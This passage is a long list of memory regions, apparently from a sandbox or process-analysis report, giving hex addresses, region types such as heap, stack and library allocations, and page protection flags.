page read and write
|
||
19A85D81000
|
heap
|
page read and write
|
||
7FFE13320000
|
unkown
|
page readonly
|
||
202AC186000
|
heap
|
page read and write
|
||
1B7ECCCA000
|
heap
|
page read and write
|
||
1B7EC190000
|
direct allocation
|
page read and write
|
||
1B7EDDF0000
|
direct allocation
|
page read and write
|
||
1B7ECC80000
|
heap
|
page read and write
|
||
19D366A1000
|
heap
|
page read and write
|
||
22E56800000
|
heap
|
page read and write
|
||
1CE8FB2F000
|
heap
|
page read and write
|
||
1B7ECDC5000
|
heap
|
page read and write
|
||
1B7EC6CA000
|
heap
|
page read and write
|
||
1F4256B7000
|
heap
|
page read and write
|
||
1B7ECC00000
|
heap
|
page read and write
|
||
22CC0F74000
|
heap
|
page read and write
|
||
1B7EC82A000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
19D3608A000
|
heap
|
page read and write
|
||
1B7EC643000
|
heap
|
page read and write
|
||
1B7ECE28000
|
heap
|
page read and write
|
||
1B7ED2C4000
|
heap
|
page read and write
|
||
1B7ECB39000
|
heap
|
page read and write
|
||
1B7EE000000
|
trusted library allocation
|
page read and write
|
||
1E0805F0000
|
direct allocation
|
page read and write
|
||
7FFDFACC8000
|
unkown
|
page execute and read and write
|
||
1B7EC372000
|
heap
|
page read and write
|
||
194D7660000
|
heap
|
page read and write
|
||
2D5FCFC000
|
stack
|
page read and write
|
||
35FFD92000
|
stack
|
page read and write
|
||
1B7ECC84000
|
heap
|
page read and write
|
||
1B7EC6CF000
|
heap
|
page read and write
|
||
1AABE370000
|
heap
|
page read and write
|
||
1EAC1FB0000
|
heap
|
page read and write
|
||
1FA18E35000
|
heap
|
page read and write
|
||
1B7ECCDD000
|
heap
|
page read and write
|
||
185BC780000
|
heap
|
page read and write
|
||
7FFD9ABE0000
|
trusted library allocation
|
page read and write
|
||
7FFDFAC97000
|
unkown
|
page execute and read and write
|
||
1B7EC75C000
|
heap
|
page read and write
|
||
1B7EC6CA000
|
heap
|
page read and write
|
||
1B7ECC84000
|
heap
|
page read and write
|
||
1B7ECC94000
|
heap
|
page read and write
|
||
22AA5F49000
|
heap
|
page read and write
|
||
1B7ED167000
|
heap
|
page read and write
|
||
22AA59F0000
|
heap
|
page read and write
|
||
160A43A1000
|
heap
|
page read and write
|
||
185BC404000
|
heap
|
page read and write
|
||
1B7EE050000
|
heap
|
page read and write
|
||
22CC0F6F000
|
heap
|
page read and write
|
||
185BC560000
|
heap
|
page execute and read and write
|
||
7FFDFAD4C000
|
unkown
|
page execute and read and write
|
||
19D36018000
|
heap
|
page read and write
|
||
2240CA31000
|
heap
|
page read and write
|
||
1CE8FADD000
|
heap
|
page read and write
|
||
1B7EC721000
|
heap
|
page read and write
|
||
1B7EC63A000
|
heap
|
page read and write
|
||
1B7ECD1D000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
1E0FD153000
|
heap
|
page read and write
|
||
1B7ECDDB000
|
heap
|
page read and write
|
||
1B7ECC33000
|
heap
|
page read and write
|
||
25A16D14000
|
heap
|
page read and write
|
||
1B7EC721000
|
heap
|
page read and write
|
||
13B455F0000
|
heap
|
page read and write
|
||
22AA5A42000
|
heap
|
page read and write
|
||
1FF5A845000
|
heap
|
page read and write
|
||
1B7EC6C1000
|
heap
|
page read and write
|
||
1B7ECCE9000
|
heap
|
page read and write
|
||
1BF9D2C5000
|
heap
|
page read and write
|
||
1B7ECF60000
|
heap
|
page read and write
|
||
1B7ECF61000
|
heap
|
page read and write
|
||
22AA59F6000
|
heap
|
page read and write
|
||
1B7ECADD000
|
heap
|
page read and write
|
||
19D366AD000
|
heap
|
page read and write
|
||
1B7ECE78000
|
heap
|
page read and write
|
||
1B7ECC29000
|
heap
|
page read and write
|
||
22AA5F3C000
|
heap
|
page read and write
|
||
1B7ECD1D000
|
heap
|
page read and write
|
||
1D726AF3000
|
heap
|
page read and write
|
||
160A443B000
|
heap
|
page read and write
|
||
1B7EDD70000
|
direct allocation
|
page read and write
|
||
1CA38190000
|
heap
|
page read and write
|
||
1B7EC6AB000
|
heap
|
page read and write
|
||
1B7EC6BB000
|
heap
|
page read and write
|
||
268F4E80000
|
heap
|
page read and write
|
||
1F8A3C9A000
|
heap
|
page read and write
|
||
1B7ED9E0000
|
direct allocation
|
page read and write
|
||
6AC9E4E000
|
stack
|
page read and write
|
||
19D36065000
|
heap
|
page read and write
|
||
70C18FF000
|
stack
|
page read and write
|
||
1E0FD0E6000
|
heap
|
page read and write
|
||
1B7EC7FA000
|
heap
|
page read and write
|
||
1FBE3B20000
|
heap
|
page read and write
|
||
7FFD9AC10000
|
trusted library allocation
|
page read and write
|
||
1B7EC348000
|
heap
|
page read and write
|
||
7FFD9AB41000
|
trusted library allocation
|
page read and write
|
||
5E446FF000
|
unkown
|
page read and write
|
||
1B7ECD26000
|
heap
|
page read and write
|
||
11C921C8000
|
heap
|
page read and write
|
||
1B7ED830000
|
direct allocation
|
page read and write
|
||
1BEA7D90000
|
heap
|
page read and write
|
||
202AC737000
|
heap
|
page read and write
|
||
202AE02D000
|
heap
|
page read and write
|
||
1B7ECD74000
|
heap
|
page read and write
|
||
28937C47000
|
heap
|
page read and write
|
||
1B7ECD31000
|
heap
|
page read and write
|
||
1BF9D2F0000
|
heap
|
page read and write
|
||
1B7ECE1F000
|
heap
|
page read and write
|
||
18986FF000
|
stack
|
page read and write
|
||
185A255D000
|
heap
|
page read and write
|
||
1B7ECBD2000
|
heap
|
page read and write
|
||
160A43BB000
|
heap
|
page read and write
|
||
185A3F30000
|
heap
|
page execute and read and write
|
||
19D366BA000
|
heap
|
page read and write
|
||
19D36690000
|
heap
|
page read and write
|
||
7FFE13249000
|
unkown
|
page execute and read and write
|
||
22CC0F6D000
|
heap
|
page read and write
|
||
25A14BC2000
|
heap
|
page read and write
|
||
1F4255C0000
|
heap
|
page read and write
|
||
1F397CA5000
|
heap
|
page read and write
|
||
7FF7E2F31000
|
unkown
|
page execute read
|
||
7FF7ADE8F000
|
unkown
|
page write copy
|
||
7FFD9AC00000
|
trusted library allocation
|
page read and write
|
||
1B7EC63E000
|
heap
|
page read and write
|
||
7FFD9AC60000
|
trusted library allocation
|
page read and write
|
||
1BF9D2FD000
|
heap
|
page read and write
|
||
4BA417F000
|
stack
|
page read and write
|
||
1B7EC635000
|
heap
|
page read and write
|
||
185A253F000
|
heap
|
page read and write
|
||
1B7ECEA5000
|
heap
|
page read and write
|
||
13B456F0000
|
heap
|
page read and write
|
||
202AC0E0000
|
heap
|
page read and write
|
||
17ACFDF0000
|
heap
|
page read and write
|
||
7FFDFB509000
|
unkown
|
page execute and read and write
|
||
20C32E30000
|
heap
|
page read and write
|
||
1B7ED031000
|
heap
|
page read and write
|
||
7FF7ADE7C000
|
unkown
|
page readonly
|
||
17ACFBB1000
|
heap
|
page read and write
|
||
185B3FE3000
|
trusted library allocation
|
page read and write
|
||
1B7EC6A4000
|
heap
|
page read and write
|
||
7FFDFACC2000
|
unkown
|
page execute and read and write
|
||
9187EFE000
|
stack
|
page read and write
|
||
25A14B82000
|
heap
|
page read and write
|
||
7FF7ADE50000
|
unkown
|
page readonly
|
||
7FFE1A479000
|
unkown
|
page execute and read and write
|
||
1B7ECC21000
|
heap
|
page read and write
|
||
1B7ECDE0000
|
heap
|
page read and write
|
||
251C6AD0000
|
heap
|
page read and write
|
||
2240CA31000
|
heap
|
page read and write
|
||
1B7EC190000
|
direct allocation
|
page read and write
|
||
1B7EDD80000
|
direct allocation
|
page read and write
|
||
2BAFE1D7000
|
heap
|
page read and write
|
||
1B7ECC18000
|
heap
|
page read and write
|
||
1B7EC6C3000
|
heap
|
page read and write
|
||
185A4198000
|
trusted library allocation
|
page read and write
|
||
1FA18EC3000
|
heap
|
page read and write
|
||
5038C7F000
|
stack
|
page read and write
|
||
160A49EC000
|
heap
|
page read and write
|
||
1B7ECC2E000
|
heap
|
page read and write
|
||
1F8A3F70000
|
heap
|
page read and write
|
||
1B7ECD1D000
|
heap
|
page read and write
|
||
943AA7B000
|
stack
|
page read and write
|
||
1F8A3CA8000
|
heap
|
page read and write
|
||
7FFE14648000
|
unkown
|
page read and write
|
||
1B7EDE90000
|
direct allocation
|
page read and write
|
||
1B7ECD08000
|
heap
|
page read and write
|
||
1F23E260000
|
heap
|
page read and write
|
||
1D726AE6000
|
heap
|
page read and write
|
||
1CA37E63000
|
heap
|
page read and write
|
||
1B7ECE15000
|
heap
|
page read and write
|
||
185A5281000
|
trusted library allocation
|
page read and write
|
||
1CE8CA2B000
|
heap
|
page read and write
|
||
1B7ECD84000
|
heap
|
page read and write
|
||
1B7ECC32000
|
heap
|
page read and write
|
||
22AA59E5000
|
heap
|
page read and write
|
||
1B7ECDCE000
|
heap
|
page read and write
|
||
1B7EC1E5000
|
heap
|
page read and write
|
||
202AC638000
|
heap
|
page read and write
|
||
161FEEF0000
|
heap
|
page read and write
|
||
1B7EDE20000
|
direct allocation
|
page read and write
|
||
1B7EDDE0000
|
direct allocation
|
page read and write
|
||
1B7ED1BC000
|
heap
|
page read and write
|
||
1BF9D2FD000
|
heap
|
page read and write
|
||
19D35FF5000
|
heap
|
page read and write
|
||
25A14BA3000
|
heap
|
page read and write
|
||
1B7ED0A1000
|
heap
|
page read and write
|
||
22AA7811000
|
heap
|
page read and write
|
||
1B7ECC43000
|
heap
|
page read and write
|
||
D8CF8FF000
|
stack
|
page read and write
|
||
1F23DF58000
|
heap
|
page read and write
|
||
6E33BFF000
|
stack
|
page read and write
|
||
25A16D0E000
|
heap
|
page read and write
|
||
1D807370000
|
heap
|
page read and write
|
||
19D36080000
|
heap
|
page read and write
|
||
1B7EC6CF000
|
heap
|
page read and write
|
||
3184CFC000
|
stack
|
page read and write
|
||
1F4256B7000
|
heap
|
page read and write
|
||
1B7ECE15000
|
heap
|
page read and write
|
||
1B7EC70B000
|
heap
|
page read and write
|
||
160A6281000
|
heap
|
page read and write
|
||
1E0FCEC0000
|
heap
|
page read and write
|
||
1B7ECD61000
|
heap
|
page read and write
|
||
7FFD9ABA0000
|
trusted library allocation
|
page read and write
|
||
160A49EF000
|
heap
|
page read and write
|
||
7FFD9ADD0000
|
trusted library allocation
|
page read and write
|
||
1B7ECB53000
|
heap
|
page read and write
|
||
1B7ECD3F000
|
heap
|
page read and write
|
||
25A16D06000
|
heap
|
page read and write
|
||
1B7ECB21000
|
heap
|
page read and write
|
||
1B7EC640000
|
heap
|
page read and write
|
||
1CE8FA00000
|
heap
|
page read and write
|
||
1B7EDE70000
|
direct allocation
|
page read and write
|
||
202AC195000
|
heap
|
page read and write
|
||
251C6AF0000
|
heap
|
page read and write
|
||
19D36061000
|
heap
|
page read and write
|
||
7FFE126D0000
|
unkown
|
page readonly
|
||
1B7ECDD1000
|
heap
|
page read and write
|
||
1FF5A5F7000
|
heap
|
page read and write
|
||
1E0FD153000
|
heap
|
page read and write
|
||
7FFD9AC80000
|
trusted library allocation
|
page read and write
|
||
1B7ECD40000
|
heap
|
page read and write
|
||
160A4A09000
|
heap
|
page read and write
|
||
1B7EC6B3000
|
heap
|
page read and write
|
||
1CE8FAC9000
|
heap
|
page read and write
|
||
1B7ECC79000
|
heap
|
page read and write
|
||
1B7EDDF0000
|
direct allocation
|
page read and write
|
||
1E0FD0DF000
|
heap
|
page read and write
|
||
23C91310000
|
heap
|
page read and write
|
||
1D8074EA000
|
heap
|
page read and write
|
||
1B7ECC76000
|
heap
|
page read and write
|
||
202AC1AB000
|
heap
|
page read and write
|
||
161FEF4A000
|
heap
|
page read and write
|
||
1F5214D0000
|
heap
|
page read and write
|
||
1B7EDDC0000
|
direct allocation
|
page read and write
|
||
3F8B2FC000
|
stack
|
page read and write
|
||
1B7ECE30000
|
heap
|
page read and write
|
||
1B7EC6EC000
|
heap
|
page read and write
|
||
7FFD9AD10000
|
trusted library allocation
|
page read and write
|
||
1B7ECBEA000
|
heap
|
page read and write
|
||
19D36110000
|
trusted library allocation
|
page read and write
|
||
22AA5A0C000
|
heap
|
page read and write
|
||
1B7ECE76000
|
heap
|
page read and write
|
||
17DDA310000
|
heap
|
page read and write
|
||
1B7ECC9B000
|
heap
|
page read and write
|
||
1EAC1D11000
|
heap
|
page read and write
|
||
25A14AB0000
|
heap
|
page read and write
|
||
1E0FD0CD000
|
heap
|
page read and write
|
||
1CE8E220000
|
heap
|
page read and write
|
||
1A2AB1B1000
|
heap
|
page read and write
|
||
160A43E2000
|
heap
|
page read and write
|
||
22AA59E0000
|
heap
|
page read and write
|
||
7FFE00468000
|
unkown
|
page read and write
|
||
13A072F0000
|
heap
|
page read and write
|
||
185A56F5000
|
trusted library allocation
|
page read and write
|
||
185A2440000
|
heap
|
page read and write
|
||
22AA7816000
|
heap
|
page read and write
|
||
1E0806B0000
|
direct allocation
|
page read and write
|
||
202AC195000
|
heap
|
page read and write
|
||
1CE8FAC3000
|
heap
|
page read and write
|
||
1D726AE4000
|
heap
|
page read and write
|
||
1B7EC6EE000
|
heap
|
page read and write
|
||
19D36065000
|
heap
|
page read and write
|
||
22AA781D000
|
heap
|
page read and write
|
||
1B7ED930000
|
direct allocation
|
page read and write
|
||
23C913CA000
|
heap
|
page read and write
|
||
1D8074E0000
|
heap
|
page read and write
|
||
1B7ECE28000
|
heap
|
page read and write
|
||
22AA5A2A000
|
heap
|
page read and write
|
||
185BC7F2000
|
heap
|
page read and write
|
||
2739F6F0000
|
heap
|
page read and write
|
||
2739F73D000
|
heap
|
page read and write
|
||
1B7EC3B3000
|
heap
|
page read and write
|
||
8210CCB000
|
stack
|
page read and write
|
||
1D726ADE000
|
heap
|
page read and write
|
||
1BF9D560000
|
heap
|
page read and write
|
||
19D35FB0000
|
heap
|
page read and write
|
||
1B7EC7E8000
|
heap
|
page read and write
|
||
1B7ED47E000
|
heap
|
page read and write
|
||
1FA18EA8000
|
heap
|
page read and write
|
||
B97ED0C000
|
stack
|
page read and write
|
||
1E0FD0A7000
|
heap
|
page read and write
|
||
25A14BD6000
|
heap
|
page read and write
|
||
7FFD9ABD0000
|
trusted library allocation
|
page read and write
|
||
160A4438000
|
heap
|
page read and write
|
||
22AA59D6000
|
heap
|
page read and write
|
||
25A14BC4000
|
heap
|
page read and write
|
||
259EADB000
|
stack
|
page read and write
|
||
1CE8FABD000
|
heap
|
page read and write
|
||
1FA18EC3000
|
heap
|
page read and write
|
||
35802FD000
|
stack
|
page read and write
|
||
1FBE38C0000
|
heap
|
page read and write
|
||
25A14EE5000
|
heap
|
page read and write
|
||
1B7EC640000
|
heap
|
page read and write
|
||
4BA3D47000
|
stack
|
page read and write
|
||
290E5A00000
|
heap
|
page read and write
|
||
1B7EA880000
|
heap
|
page read and write
|
||
185A2680000
|
heap
|
page read and write
|
||
1B7EC368000
|
heap
|
page read and write
|
||
22AA5A16000
|
heap
|
page read and write
|
||
22AA5A0C000
|
heap
|
page read and write
|
||
1B7EDA10000
|
direct allocation
|
page read and write
|
||
7FF7ADE50000
|
unkown
|
page readonly
|
||
7FFE13319000
|
unkown
|
page execute and read and write
|
||
1B7ECC9B000
|
heap
|
page read and write
|
||
1CE8FAF5000
|
heap
|
page read and write
|
||
1B7ECC23000
|
heap
|
page read and write
|
||
1B7EC6CA000
|
heap
|
page read and write
|
||
1B7EDDF0000
|
direct allocation
|
page read and write
|
||
6AC8F7E000
|
stack
|
page read and write
|
||
1F23DF67000
|
heap
|
page read and write
|
||
1B7ECD3D000
|
heap
|
page read and write
|
||
1F4256A2000
|
heap
|
page read and write
|
||
202AC179000
|
heap
|
page read and write
|
||
1B7ECD28000
|
heap
|
page read and write
|
||
25A14BCA000
|
heap
|
page read and write
|
||
1B7EDA24000
|
direct allocation
|
page read and write
|
||
194D78E5000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
7FF7E2F30000
|
unkown
|
page readonly
|
||
19D35FFE000
|
heap
|
page read and write
|
||
22AA5A01000
|
heap
|
page read and write
|
||
25A14BC2000
|
heap
|
page read and write
|
||
1B7ECFAC000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
1B7ECC2E000
|
heap
|
page read and write
|
||
18A400D0000
|
heap
|
page read and write
|
||
1FA18E40000
|
heap
|
page read and write
|
||
1B7ECC43000
|
heap
|
page read and write
|
||
19D36063000
|
heap
|
page read and write
|
||
160A49E8000
|
heap
|
page read and write
|
||
7FFDFF303000
|
unkown
|
page read and write
|
||
91BB8FF000
|
stack
|
page read and write
|
||
19D36087000
|
heap
|
page read and write
|
||
7FFD9AC70000
|
trusted library allocation
|
page read and write
|
||
13B45410000
|
heap
|
page read and write
|
||
2240C950000
|
heap
|
page read and write
|
||
1DFDFF000
|
stack
|
page read and write
|
||
20ED9350000
|
heap
|
page read and write
|
||
623337E000
|
stack
|
page read and write
|
||
22AA59D9000
|
heap
|
page read and write
|
||
23C913D2000
|
heap
|
page read and write
|
||
252A3B9A000
|
heap
|
page read and write
|
||
9187B4E000
|
stack
|
page read and write
|
||
1B7ECE28000
|
heap
|
page read and write
|
||
582730B000
|
stack
|
page read and write
|
||
1B7ECD13000
|
heap
|
page read and write
|
||
22AA5F49000
|
heap
|
page read and write
|
||
1B7ECC7B000
|
heap
|
page read and write
|
||
251C6AB0000
|
heap
|
page read and write
|
||
1FBE3B25000
|
heap
|
page read and write
|
||
160A4441000
|
heap
|
page read and write
|
||
1F397B00000
|
heap
|
page read and write
|
||
19D3669C000
|
heap
|
page read and write
|
||
160A4433000
|
heap
|
page read and write
|
||
25A1538B000
|
heap
|
page read and write
|
||
1F52159A000
|
heap
|
page read and write
|
||
1B7EC6F0000
|
heap
|
page read and write
|
||
7FFD9A9AB000
|
trusted library allocation
|
page read and write
|
||
1B7ECF13000
|
heap
|
page read and write
|
||
1E08071D000
|
direct allocation
|
page read and write
|
||
160A443C000
|
heap
|
page read and write
|
||
202AC638000
|
heap
|
page read and write
|
||
1B7ECF39000
|
heap
|
page read and write
|
||
202AC182000
|
heap
|
page read and write
|
||
7FFD9ACFC000
|
trusted library allocation
|
page read and write
|
||
1B7EDE60000
|
direct allocation
|
page read and write
|
||
1CE8FA91000
|
heap
|
page read and write
|
||
268F4E40000
|
heap
|
page read and write
|
||
1B7ECF06000
|
heap
|
page read and write
|
||
1B7ED48E000
|
heap
|
page read and write
|
||
39993FF000
|
stack
|
page read and write
|
||
1B7ECDDB000
|
heap
|
page read and write
|
||
160A4433000
|
heap
|
page read and write
|
||
185BC6FC000
|
heap
|
page read and write
|
||
1B7ECC0A000
|
heap
|
page read and write
|
||
202AC73A000
|
heap
|
page read and write
|
||
1D807501000
|
heap
|
page read and write
|
||
1B7ECE8F000
|
heap
|
page read and write
|
||
1B7ECCE1000
|
heap
|
page read and write
|
||
194D7668000
|
heap
|
page read and write
|
||
11C924C5000
|
heap
|
page read and write
|
||
7FFE126F3000
|
unkown
|
page read and write
|
||
1CE8FAC3000
|
heap
|
page read and write
|
||
7FFD9ACA0000
|
trusted library allocation
|
page read and write
|
||
1B7ECC69000
|
heap
|
page read and write
|
||
837EDDE000
|
stack
|
page read and write
|
||
1B7ECCCD000
|
heap
|
page read and write
|
||
1FF5A530000
|
heap
|
page read and write
|
||
25A16D0E000
|
heap
|
page read and write
|
||
1BF9D2ED000
|
heap
|
page read and write
|
||
7FFE1A45A000
|
unkown
|
page execute and write copy
|
||
1EAC1D08000
|
heap
|
page read and write
|
||
1B7EC69B000
|
heap
|
page read and write
|
||
19A85D7A000
|
heap
|
page read and write
|
||
1B7ECDED000
|
heap
|
page read and write
|
||
1CE8E68B000
|
heap
|
page read and write
|
||
1B7ECE75000
|
heap
|
page read and write
|
||
1F8A3CB0000
|
heap
|
page read and write
|
||
22CC0E00000
|
heap
|
page read and write
|
||
185BC3C0000
|
heap
|
page read and write
|
||
19D3602C000
|
heap
|
page read and write
|
||
58277FF000
|
stack
|
page read and write
|
||
19D37F3E000
|
heap
|
page read and write
|
||
1B7ECDBD000
|
heap
|
page read and write
|
||
1CE8FAC3000
|
heap
|
page read and write
|
||
1B7ECADD000
|
heap
|
page read and write
|
||
7FFD9ABE0000
|
trusted library allocation
|
page read and write
|
||
1E0FD0E6000
|
heap
|
page read and write
|
||
26C3D8D0000
|
heap
|
page read and write
|
||
202AC17A000
|
heap
|
page read and write
|
||
1B7ECCDD000
|
heap
|
page read and write
|
||
2BAFE040000
|
heap
|
page read and write
|
||
28937BF0000
|
heap
|
page read and write
|
||
1B7EC1A0000
|
direct allocation
|
page read and write
|
||
309A7FF000
|
stack
|
page read and write
|
||
1B7EC7D0000
|
heap
|
page read and write
|
||
19A85D71000
|
heap
|
page read and write
|
||
14233855000
|
heap
|
page read and write
|
||
1F425693000
|
heap
|
page read and write
|
||
25A15378000
|
heap
|
page read and write
|
||
19D3669F000
|
heap
|
page read and write
|
||
22AA59D5000
|
heap
|
page read and write
|
||
1B7ECDF1000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
1B7ECEDF000
|
heap
|
page read and write
|
||
1F8A3CB0000
|
heap
|
page read and write
|
||
1B7EDE20000
|
direct allocation
|
page read and write
|
||
7FFD9AD10000
|
trusted library allocation
|
page read and write
|
||
18A40340000
|
heap
|
page read and write
|
||
22AA5F3C000
|
heap
|
page read and write
|
||
7FFDFB5D4000
|
unkown
|
page execute and read and write
|
||
2BAFE09B000
|
heap
|
page read and write
|
||
B97F07F000
|
stack
|
page read and write
|
||
2AD315F0000
|
heap
|
page read and write
|
||
185A3E70000
|
trusted library allocation
|
page read and write
|
||
1BF9D2ED000
|
heap
|
page read and write
|
||
19D36083000
|
heap
|
page read and write
|
||
1B7ECC97000
|
heap
|
page read and write
|
||
1CE8E9B2000
|
heap
|
page read and write
|
||
167DAE70000
|
heap
|
page read and write
|
||
1B7EC368000
|
heap
|
page read and write
|
||
1B7ECB21000
|
heap
|
page read and write
|
||
1B7ECDA0000
|
heap
|
page read and write
|
||
19D37F3D000
|
heap
|
page read and write
|
||
202AC2C5000
|
heap
|
page read and write
|
||
7FFE148B0000
|
unkown
|
page readonly
|
||
1B7EC6AB000
|
heap
|
page read and write
|
||
1B7ECE28000
|
heap
|
page read and write
|
||
1A2AB1B1000
|
heap
|
page read and write
|
||
1B7EDFE0000
|
direct allocation
|
page read and write
|
||
1B7ECC82000
|
heap
|
page read and write
|
||
185A258F000
|
heap
|
page read and write
|
||
943AB7F000
|
stack
|
page read and write
|
||
1FF5A840000
|
heap
|
page read and write
|
||
160A443A000
|
heap
|
page read and write
|
||
7FF7E2FCE000
|
unkown
|
page read and write
|
||
1E0FD0CF000
|
heap
|
page read and write
|
||
202AC1BE000
|
heap
|
page read and write
|
||
7FFE00424000
|
unkown
|
page execute and read and write
|
||
1B7ECBD4000
|
heap
|
page read and write
|
||
1B7ECCF1000
|
heap
|
page read and write
|
||
22AA59E6000
|
heap
|
page read and write
|
||
7FFD9A994000
|
trusted library allocation
|
page read and write
|
||
1B7EC643000
|
heap
|
page read and write
|
||
19D37F34000
|
heap
|
page read and write
|
||
1CA2FE11000
|
trusted library allocation
|
page read and write
|
||
1B7ECC80000
|
heap
|
page read and write
|
||
1B7EC73A000
|
heap
|
page read and write
|
||
160A4433000
|
heap
|
page read and write
|
||
7FFD9AC00000
|
trusted library allocation
|
page read and write
|
||
1B7ECCEB000
|
heap
|
page read and write
|
||
1B7EC38D000
|
heap
|
page read and write
|
||
1F8A3C70000
|
heap
|
page read and write
|
||
202AC1B3000
|
heap
|
page read and write
|
||
1B7ECDE3000
|
heap
|
page read and write
|
||
D8CF7FF000
|
unkown
|
page read and write
|
||
7FFDFAD12000
|
unkown
|
page execute and read and write
|
||
7FFD9AC80000
|
trusted library allocation
|
page read and write
|
||
160A44CE000
|
heap
|
page read and write
|
||
1CA1E15C000
|
heap
|
page read and write
|
||
1B7EDD80000
|
direct allocation
|
page read and write
|
||
7FFD9AD90000
|
trusted library allocation
|
page read and write
|
||
1CE8FC08000
|
heap
|
page read and write
|
||
160A4446000
|
heap
|
page read and write
|
||
9511FF000
|
unkown
|
page read and write
|
||
1A2AB19A000
|
heap
|
page read and write
|
||
1B7ECD17000
|
heap
|
page read and write
|
||
22E56B34000
|
heap
|
page read and write
|
||
22AA59EF000
|
heap
|
page read and write
|
||
22AA594A000
|
heap
|
page read and write
|
||
1B7ECD70000
|
heap
|
page read and write
|
||
1B7EC760000
|
heap
|
page read and write
|
||
167DAE90000
|
heap
|
page read and write
|
||
1B7ECC2F000
|
heap
|
page read and write
|
||
1B7ECF49000
|
heap
|
page read and write
|
||
22AA5A12000
|
heap
|
page read and write
|
||
32747E000
|
stack
|
page read and write
|
||
22AA5A44000
|
heap
|
page read and write
|
||
7FFD9ADE0000
|
trusted library allocation
|
page read and write
|
||
1B7ECBD2000
|
heap
|
page read and write
|
||
74B6DCE000
|
stack
|
page read and write
|
||
943AAFF000
|
stack
|
page read and write
|
||
C50B0FE000
|
stack
|
page read and write
|
||
1B7ECC32000
|
heap
|
page read and write
|
||
2240CA1B000
|
heap
|
page read and write
|
||
1B7ECAFD000
|
heap
|
page read and write
|
||
202AC1A5000
|
heap
|
page read and write
|
||
160A6294000
|
heap
|
page read and write
|
||
2240C850000
|
heap
|
page read and write
|
||
1B7ECD41000
|
heap
|
page read and write
|
||
1A2AB0F0000
|
heap
|
page read and write
|
||
7FFDFF191000
|
unkown
|
page execute and read and write
|
||
1B7EC720000
|
heap
|
page read and write
|
||
1CA1E280000
|
trusted library allocation
|
page read and write
|
||
7FFD9AC90000
|
trusted library allocation
|
page read and write
|
||
2245E7DA000
|
heap
|
page read and write
|
||
7FFE00457000
|
unkown
|
page execute and read and write
|
||
1B7EDDB0000
|
direct allocation
|
page read and write
|
||
1B7EC792000
|
heap
|
page read and write
|
||
1B7EC6CF000
|
heap
|
page read and write
|
||
7FFD9AB4A000
|
trusted library allocation
|
page read and write
|
||
22AA5F52000
|
heap
|
page read and write
|
||
1B7ECC72000
|
heap
|
page read and write
|
||
28937F10000
|
heap
|
page read and write
|
||
7FFE14647000
|
unkown
|
page execute and write copy
|
||
1B7ECC8A000
|
heap
|
page read and write
|
||
1CA1E152000
|
heap
|
page read and write
|
||
1B7ECE26000
|
heap
|
page read and write
|
||
22AA5F20000
|
heap
|
page read and write
|
||
1B7ECE47000
|
heap
|
page read and write
|
||
160A4395000
|
heap
|
page read and write
|
||
290E5C20000
|
heap
|
page read and write
|
||
1CA21AA4000
|
trusted library allocation
|
page read and write
|
||
7FFDFB6DA000
|
unkown
|
page execute and read and write
|
||
6E33B7C000
|
stack
|
page read and write
|
||
2DF513D1000
|
heap
|
page read and write
|
||
1CE8C97A000
|
heap
|
page read and write
|
||
1F425699000
|
heap
|
page read and write
|
||
18A401D0000
|
heap
|
page read and write
|
||
1CA21700000
|
trusted library allocation
|
page read and write
|
||
1F23E265000
|
heap
|
page read and write
|
||
2A1E14E000
|
stack
|
page read and write
|
||
202AC73A000
|
heap
|
page read and write
|
||
1B7EC6B0000
|
heap
|
page read and write
|
||
185BC4B8000
|
heap
|
page read and write
|
||
185A57DA000
|
trusted library allocation
|
page read and write
|
||
22AA59FE000
|
heap
|
page read and write
|
||
185A2620000
|
trusted library allocation
|
page read and write
|
||
7FFD9ABC0000
|
trusted library allocation
|
page read and write
|
||
1B7EC681000
|
heap
|
page read and write
|
||
7FFD9AB60000
|
trusted library allocation
|
page execute and read and write
|
||
1B7ECB21000
|
heap
|
page read and write
|
||
13B454F0000
|
heap
|
page read and write
|
||
1B7EE1D0000
|
direct allocation
|
page read and write
|
||
74B6BDF000
|
stack
|
page read and write
|
||
6232E9B000
|
stack
|
page read and write
|
||
1B7ECC82000
|
heap
|
page read and write
|
||
17DDA340000
|
heap
|
page read and write
|
||
7FFE003A1000
|
unkown
|
page execute and read and write
|
||
2D5FEFF000
|
stack
|
page read and write
|
||
1B7ECEDF000
|
heap
|
page read and write
|
||
35FFD98000
|
stack
|
page read and write
|
||
18A4024A000
|
heap
|
page read and write
|
||
25A14BCC000
|
heap
|
page read and write
|
||
194D7644000
|
heap
|
page read and write
|
||
22AA7812000
|
heap
|
page read and write
|
||
22AA59B2000
|
heap
|
page read and write
|
||
7FFDFB086000
|
unkown
|
page execute and read and write
|
||
1CA1E158000
|
heap
|
page read and write
|
||
7FFD9ACE4000
|
trusted library allocation
|
page read and write
|
||
25A14E14000
|
heap
|
page read and write
|
||
25A15399000
|
heap
|
page read and write
|
||
7FFD9AA40000
|
trusted library allocation
|
page read and write
|
||
160A443C000
|
heap
|
page read and write
|
||
F0544FF000
|
unkown
|
page read and write
|
||
1B7ECC86000
|
heap
|
page read and write
|
||
20C32F8B000
|
heap
|
page read and write
|
||
1B7ECDB3000
|
heap
|
page read and write
|
||
1BEA7CB1000
|
heap
|
page read and write
|
||
202AC61E000
|
heap
|
page read and write
|
||
1B7ECE15000
|
heap
|
page read and write
|
||
1FA18EBD000
|
heap
|
page read and write
|
||
7FFD9AC20000
|
trusted library allocation
|
page read and write
|
||
251C6DE0000
|
heap
|
page read and write
|
||
1CE8EAE6000
|
heap
|
page read and write
|
||
17ACFB10000
|
heap
|
page read and write
|
||
91BB5EC000
|
stack
|
page read and write
|
||
1B7ECBE1000
|
heap
|
page read and write
|
||
1B7ECC31000
|
heap
|
page read and write
|
||
7FFE13321000
|
unkown
|
page execute and read and write
|
||
1BEA7ED5000
|
heap
|
page read and write
|
||
1B7ECC94000
|
heap
|
page read and write
|
||
22F007F000
|
stack
|
page read and write
|
||
202AC1AC000
|
heap
|
page read and write
|
||
268F4ECA000
|
heap
|
page read and write
|
||
1B7ECE78000
|
heap
|
page read and write
|
||
22AA5F3C000
|
heap
|
page read and write
|
||
1CA21AA8000
|
trusted library allocation
|
page read and write
|
||
